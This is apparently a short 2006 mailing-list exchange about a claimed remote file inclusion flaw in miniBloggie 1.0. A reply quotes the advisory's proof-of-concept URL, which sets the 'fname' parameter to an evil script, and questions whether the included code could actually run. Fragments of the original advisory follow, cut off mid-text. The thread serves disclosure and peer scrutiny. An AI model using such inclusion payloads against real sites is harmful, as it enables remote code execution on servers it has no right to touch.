Re: miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability

[EMAIL PROTECTED] schrieb am Thu, 10 Aug 2006 20:38:38 +: >PoC: > >~~~ > >http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script] Now you have your evil script included in a function. But how would you call the function, to execute your script? Regards Carsten -- Di

miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability

--- miniBloggie 1.0 fname Remote File Inclusion --- Author : Sh3ll Date : 2006/05/01 HomePage : http://www.sh3ll.ir Con